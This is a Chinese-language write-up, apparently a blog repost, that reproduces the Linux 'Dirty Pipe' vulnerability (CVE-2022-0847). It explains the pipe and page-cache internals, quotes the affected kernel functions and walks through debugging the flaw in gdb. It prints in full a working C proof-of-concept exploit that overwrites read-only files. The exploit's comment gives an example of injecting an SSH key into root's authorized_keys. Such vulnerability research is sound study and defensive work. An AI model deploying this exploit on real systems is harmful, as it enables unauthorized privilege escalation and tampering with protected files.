CVE-2022-0847复现
2023-9-19 18:13:41 Author: mp.weixin.qq.com(查看原文) 阅读量:5 收藏


漏洞介绍

在 Linux 内核的 copy_page_to_iter_pipe 和 push_pipe 函数中,管道缓冲区结构的 "flags "成员缺乏正确的初始化,因此可能包含过期的值。无权限的本地用户可利用此漏洞任意写入文件,从而完成提权。

漏洞详细

pipe机制

pipe是内核提供的一种通讯机制,返回两个文件描述符,一个用于发送数据,另一个用于接受数据。实现方式是循环队列它只能用于有血缘关系的进程间通信

pipe结构体如下:

struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs;
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};

bufs是循环数组,head用来写管道,指向buffer头部,tail用来读管道,指向buffer尾部。

pip_buffer结构体如下:

struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

pipe_write

向管道中写数据时会调用函数pipe_write()

pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
....
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;

if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;

ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}

buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
}
for (;;) {
....
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;

if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}

/* Allocate a slot in the ring in advance and attach an
* empty buffer. If we fault or otherwise fail to use
* it, either the reader will consume it or it'll still
* be there for the next write.
*/
spin_lock_irq(&pipe->rd_wait.lock);

head = pipe->head;
if (pipe_full(head, pipe->tail, pipe->max_usage)) {
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}

pipe->head = head + 1;
spin_unlock_irq(&pipe->rd_wait.lock);

/* Insert it into the buffer array */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
if (is_packetized(filp))
buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe->tmp_page = NULL;
....
}
}

pipe_write()关键功能如下:

1.如果pipe不为空,则说明pipe中还有未被读取的部分,如果未被读取的数据所在的buffer标识为PIPE_BUF_FLAG_CAN_MERGE且要写入的数据加上原来的数据不超过一个页,即可在原来的buffer上续写。

2.不符合上述条件就会新申请一个页面,将新申请的页面插入pipe中,默认初始化flag为PIPE_BUF_FLAG_CAN_MERGE,即默认状态是允许buffer续写的。

零拷贝

Linux系统中一切皆文件,Linux系统的很多活动无外乎读操作写操作,零拷贝就是为了提高读写性能而出现的。

页面高速缓存

我们知道文件一般存放在硬盘(机械硬盘或固态硬盘)中,CPU 并不能直接访问硬盘中的数据,而是需要先将硬盘中的数据读入到内存中,然后才能被 CPU 访问。由于读写硬盘的速度比读写内存要慢很多(DDR4 内存读写速度是机械硬盘500倍,是固态硬盘的200倍),所以为了避免每次读写文件时,都需要对硬盘进行读写操作,Linux 内核使用 页缓存(Page Cache) 机制来对文件中的数据进行缓存。

当用户对文件进行读写时,实际上是对文件的 页缓存 进行读写。所以对文件进行读写操作时,会分以下两种情况进行处理:

◆当从文件中读取数据时,如果要读取的数据所在的页缓存已经存在,那么就直接把页缓存的数据拷贝给用户即可。否则,内核首先会申请一个空闲的内存页(页缓存),然后从文件中读取数据到页缓存,并且把页缓存的数据拷贝给用户。

◆当向文件中写入数据时,如果要写入的数据所在的页缓存已经存在,那么直接把新数据写入到页缓存即可。否则,内核首先会申请一个空闲的内存页(页缓存),然后从文件中读取数据到页缓存,并且把新数据写入到页缓存中。对于被修改的页缓存,内核会定时把这些页缓存刷新到文件中。

将pipe_buffer直接指向页高速缓存作为pipe的buf页使用即可实现以零拷贝的方式在文件描述符之间移动数据。

copy_page_to_iter_pipe

源码:

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;

if (unlikely(bytes > i->count))
bytes = i->count;

if (unlikely(!bytes))
return 0;

if (!sanity(i))
return 0;

off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];
if (off) {
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;

buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;
buf->offset = offset;
buf->len = bytes;

pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}

关键功能如下:

1.找到pipe的写指针head。
2.将head指向的pipe_buffer的page改为准备好的文件缓存页。

这里函数没有初始化pipe_buffer的flag,如果用户调用copy_page_to_iter_pipe之前,head指向pipe_buffer是刚申请来的,那此时的pipe_buffer的flag应该为PIPE_BUF_FLAG_CAN_MERGE,如果再次调用pipe_write函数用户就可以向pipe_buffer指向的文件缓存页中写数据,这就造成了一个任意文件写。

copy_page_to_iter_pipe可以由splice调用。


调试漏洞

poc逻辑

/* SPDX-License-Identifier: GPL-2.0 */
/*
* Copyright 2022 CM4all GmbH / IONOS SE
*
* author: Max Kellermann <[email protected]>
*
* Proof-of-concept exploit for the Dirty Pipe
* vulnerability (CVE-2022-0847) caused by an uninitialized
* "pipe_buffer.flags" variable. It demonstrates how to overwrite any
* file contents in the page cache, even if the file is not permitted
* to be written, immutable or on a read-only mount.
*
* This exploit requires Linux 5.8 or later; the code path was made
* reachable by commit f6dd975583bd ("pipe: merge
* anon_pipe_buf*_ops"). The commit did not introduce the bug, it was
* there before, it just provided an easy way to exploit it.
*
* There are two major limitations of this exploit: the offset cannot
* be on a page boundary (it needs to write one byte before the offset
* to add a reference to this page to the pipe), and the write cannot
* cross a page boundary.
*
* Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
*
* Further explanation: https://dirtypipe.cm4all.com/
*/

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
* Create a pipe where all "bufs" on the pipe_inode_info ring have the
* PIPE_BUF_FLAG_CAN_MERGE flag set.
*/
//初始化pipe,将所有buffer填满再清空,这样每个buffer上都会留下PIPE_BUF_FLAG_CAN_MERGE
static void prepare_pipe(int p[2])
{
if (pipe(p)) abort();

const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
static char buffer[4096];

/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
write(p[1], buffer, n);
r -= n;
}

/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
read(p[0], buffer, n);
r -= n;
}

/* the pipe is now empty, and if somebody adds a new
pipe_buffer without initializing its "flags", the buffer
will be mergeable */
}

int main(int argc, char **argv)
{
if (argc != 4) {
fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
return EXIT_FAILURE;
}

/* dumb command-line argument parser */
const char *const path = argv[1];
loff_t offset = strtoul(argv[2], NULL, 0);
const char *const data = argv[3];
const size_t data_size = strlen(data);

if (offset % PAGE_SIZE == 0) {
fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
return EXIT_FAILURE;
}

const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
const loff_t end_offset = offset + (loff_t)data_size;
if (end_offset > next_page) {
fprintf(stderr, "Sorry, cannot write across a page boundary\n");
return EXIT_FAILURE;
}

/* open the input file and validate the specified offset */
const int fd = open(path, O_RDONLY); // yes, read-only! :-)
if (fd < 0) {
perror("open failed");
return EXIT_FAILURE;
}

struct stat st;
if (fstat(fd, &st)) {
perror("stat failed");
return EXIT_FAILURE;
}

if (offset > st.st_size) {
fprintf(stderr, "Offset is not inside the file\n");
return EXIT_FAILURE;
}

if (end_offset > st.st_size) {
fprintf(stderr, "Sorry, cannot enlarge the file\n");
return EXIT_FAILURE;
}

/* create the pipe with all flags initialized with
PIPE_BUF_FLAG_CAN_MERGE */
int p[2];
prepare_pipe(p);

/* splice one byte from before the specified offset into the
pipe; this will add a reference to the page cache, but
since copy_page_to_iter_pipe() does not initialize the
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
//初始化pipe之后用splice对打开的只读文件进行零拷贝,此时pipe写指针的buffer就会指向只读文件的页面高速缓存
--offset;
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
return EXIT_FAILURE;
}
if (nbytes == 0) {
fprintf(stderr, "short splice\n");
return EXIT_FAILURE;
}

/* the following write will not create a new pipe_buffer, but
will instead write into the page cache, because of the
PIPE_BUF_FLAG_CAN_MERGE flag */
//此时向pipe写指针中写入内容就是向只读文件中写入内容
nbytes = write(p[1], data, data_size);
if (nbytes < 0) {
perror("write failed");
return EXIT_FAILURE;
}
if ((size_t)nbytes < data_size) {
fprintf(stderr, "short write\n");
return EXIT_FAILURE;
}

printf("It worked!\n");
return EXIT_SUCCESS;
}

调试

直接在docker hub拉个搭建好的环境:https://hub.docker.com/r/chenaotian/cve-2022-0847

启动qemu的时候先把文件系统里的init脚本改一下,setuidgid 0 改成 setuidgid 1000:

启动qemu之后确认testfile事只读文件:

gdb挂上源码在do_splice打断点,执行./exp testfile 1 nihao,断下来之后在copy_page_to_iter_pipe打断点,继续运行,断下来之后运行到取buf的位置:

打印查看pipe->bufs[0]的值:

走到函数结尾处,buf[0]的page被替换为文件页高速缓存,并且offset、len、ops也都被替换,再次查看pipe->bufs[0]的值:

可以看到flag没有被替换,仍然为0x10即PIPE_BUF_FLAG_CAN_MERGE。打断点到pipe_write,继续运行,断下来并执行到取buffer处:

可以看到取出了带有页高速缓存的buf并准备写入。继续运行,成功经过判断到达写入函数:

直接继续运行,查看文件内容:

字符串成功写入只读文件,复现成功。

看雪ID:/x01

https://bbs.kanxue.com/user-home-929564.htm

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